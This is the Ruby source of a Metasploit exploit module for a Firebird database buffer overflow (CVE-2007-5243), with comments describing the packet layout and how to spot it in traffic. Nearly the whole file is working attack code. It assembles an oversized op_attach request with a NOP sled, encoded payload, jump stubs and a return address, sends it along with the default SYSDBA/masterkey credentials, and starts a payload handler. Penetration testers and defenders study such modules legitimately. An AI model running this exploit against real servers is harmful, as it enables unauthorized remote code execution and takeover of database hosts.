Path: blob/master/modules/exploits/windows/misc/fb_isc_attach_database.rb
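##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Firebird isc_attach_database() stack buffer overflow (CVE-2007-5243).
#
# A single op_attach request is sent over the Firebird wire protocol (TCP
# 3050 by default) with an oversized declared length and body; the trailing
# database parameter block (DPB) carries the default SYSDBA/masterkey
# credentials.  Per-target work happens in exploit_target, the hook that the
# BruteTargets mixin invokes for each selected target.
#
# From a detection standpoint the request is distinctive: an op_attach packet
# whose declared length is 16 KiB above the target length, a body that is
# mostly random alphabetic filler, and a DPB naming the SYSDBA account.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::BruteTargets

  # Registers module metadata and the RPORT option (3050, Firebird's default).
  #
  # 'Length' is the size of the database-name field for a target and is an
  # array so that a target may try several sizes; 'Ret' is the return address
  # written after that field.  'DefaultTarget' => 1 selects the unicode.nls
  # target.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firebird Relational Database isc_attach_database() Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Borland InterBase
          by sending a specially crafted create request.
        },
        'Author' => [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
        'Arch' => ARCH_X86,
        'Platform' => 'win',
        'References' => [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38607' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
        'Privileged' => true,
        'License' => MSF_LICENSE,
        'Payload' => {
          # Maximum encoded payload size; exploit_target fills the rest of the
          # 'Length' field with NOPs, so 'Length' must exceed Space + 13.
          'Space' => 512,
          # Bytes the encoded payload must not contain: NUL, '/', ':', '@', '\'.
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
          'StackAdjustment' => -3500,
        },
        'Targets' => [
          [ 'Brute Force', {} ],
          # '\Device\HarddiskVolume1\WINDOWS\system32\unicode.nls'
          [
            'Firebird WI-V2.0.0.12748 WI-V2.0.1.12855 (unicode.nls)',
            { 'Length' => [ 756 ], 'Ret' => 0x00370b0b }
          ],
          # Debug
          [
            'Debug',
            { 'Length' => [ 756 ], 'Ret' => 0xaabbccdd }
          ],
        ],
        'DefaultTarget' => 1,
        'DisclosureDate' => '2007-10-03',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(3050)
      ]
    )
  end

  # Builds the database parameter block (DPB) appended to the attach request.
  #
  # Layout, as written below: one version byte (isc_dpb_version1), then two
  # tag/length/value entries -- the user name (isc_dpb_user_name) and the
  # password (isc_dpb_password).  Tags and lengths are packed as single
  # bytes, so each value must fit in one byte of length; the hard-coded
  # defaults do.
  #
  # @return [String] the raw DPB bytes
  def dpb_create
    isc_dpb_user_name = 28
    isc_dpb_password = 29

    isc_dpb_version1 = 1

    # Firebird's well-known default administrator credentials.  A DPB carrying
    # this user name is the easiest thing to alert on in the traffic.
    user = 'SYSDBA'
    pass = 'masterkey'

    dpb = ''

    dpb << [isc_dpb_version1].pack('c')

    dpb << [isc_dpb_user_name].pack('c')
    dpb << [user.length].pack('c')
    dpb << user

    dpb << [isc_dpb_password].pack('c')
    dpb << [pass.length].pack('c')
    dpb << pass

    dpb
  end

  # Number of NUL bytes needed to round +length+ up to a 4-byte boundary.
  # exploit_target uses it to pad each variable-length field it writes.
  #
  # The default used to be the String '', which has no #remainder and so
  # raised NoMethodError whenever the argument was omitted; 0 is the only
  # sensible default for a byte count and is what callers now get.
  #
  # @param length [Integer] number of bytes already written
  # @return [Integer] padding in the range 0..3 (0 for negative input)
  def buf_padding(length = 0)
    remainder = length.remainder(4)
    remainder > 0 ? 4 - remainder : 0
  end

  # Sends one crafted op_attach request per entry in the target's 'Length'
  # list, then starts the payload handler.
  #
  # Packet layout, in the order written: 4-byte operation code, 4-byte id,
  # 4-byte declared length, the database-name field (NOPs, payload, two jump
  # stubs, 2 random bytes, return address), 16 KiB of random alphabetic
  # filler, NUL alignment padding, then the DPB length, the DPB and its
  # padding.  Every multi-byte field is big-endian ('N') except the jump
  # displacement and return address, which are little-endian ('V').
  #
  # NOTE(review): connect is called once per length but disconnect never is;
  # the socket is left for the Tcp mixin's cleanup to close, which only
  # matters if a target lists more than one 'Length'.
  #
  # @param target [Msf::Module::Target] target selected by BruteTargets;
  #   read via target['Length'] and target.ret
  def exploit_target(target)
    target['Length'].each do |length|
      connect

      # Attach database
      op_attach = 19

      # Extra padding to trigger the exception
      extra_padding = 1024 * 16

      buf = ''

      # Operation/packet type
      buf << [op_attach].pack('N')

      # Id
      buf << [0].pack('N')

      # Length -- declared size of the database-name field, 16 KiB larger
      # than any legitimate name; a cheap signature for IDS rules.
      buf << [length + extra_padding].pack('N')

      # Nop block.  The 13 subtracted bytes are exactly what follows the
      # payload inside the 'Length' field: 5 + 2 + 2 + 4.
      buf << make_nops(length - payload.encoded.length - 13)

      # Payload
      buf << payload.encoded

      # Jump back into the nop block
      buf << "\xe9" + [-516].pack('V')

      # Jump back
      buf << "\xeb" + [-7].pack('c')

      # Random alpha data
      buf << rand_text_alpha(2)

      # Target
      buf << [target.ret].pack('V')

      # Random alpha data
      buf << rand_text_alpha(extra_padding)

      # Padding
      buf << "\x00" * buf_padding(length + extra_padding)

      # Database parameter block

      # Create database parameter block
      dpb = dpb_create

      # Database parameter block length
      buf << [dpb.length].pack('N')

      # Database parameter block
      buf << dpb

      # Padding
      buf << "\x00" * buf_padding(dpb.length)

      sock.put(buf)

      # Kernel#select with no IO sets is simply a 4-second sleep, presumably
      # to let the server process the request before the handler runs.
      select(nil, nil, nil, 4)

      handler
    end
  end
end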